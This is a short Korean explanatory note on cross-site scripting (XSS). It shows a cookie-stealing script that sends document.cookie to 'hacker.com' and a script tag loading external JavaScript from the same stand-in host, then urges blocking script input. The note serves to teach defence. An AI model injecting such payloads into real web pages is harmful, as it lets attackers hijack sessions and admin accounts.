크로스 사이트 스크립팅 XSS

<script>스크립트코드</script>와 같이 작성

​

쿠키를 빼낼 때 사용할 수 있는 스크립트(쿠키에는 세션정보가 포함되어 있음)

<script>document.location='http://hacker.com/cookie?'+document.cookie</script>

만약 해커가 일반 게시판 글쓰기 상태에서 위와 같은 스크립트 코드를 작성해 놓으면

document.cookie 로 쿠키 정보를 얻어내고 얻어낸 정보를 document.location 위치(외부사이트)에 전달 할 수 있게 된다.

​

<script src="https:/hacker.com/hacker.js"></script>

src 를 이용하여 외부의 자바스크립트를 페이지 내에 삽입 시킬 수 있음 -> 외부 해커사이트 올려둔 악성 스크립트 파일을 실행 할 수가 있게 됨.

​

XSS 공격이란 클라이언트 쪽의 웹브라우저를 공격하는 기법으로 <script>와 같은 입력 값이 그대로 웹페이지에 표시되게 되면 위험하다. 위의 방법으로 해커가 쿠키 정보(세션정보가 포함)를 얻게 되면 사용자로 접속 할 수 있게 되며 특히 관리자 계정의 정보를 빼내게 된다면 심각한 상황을 초래 할 수 있으므로 스크립트 문구를 작성하기 못하도록 막아야한다.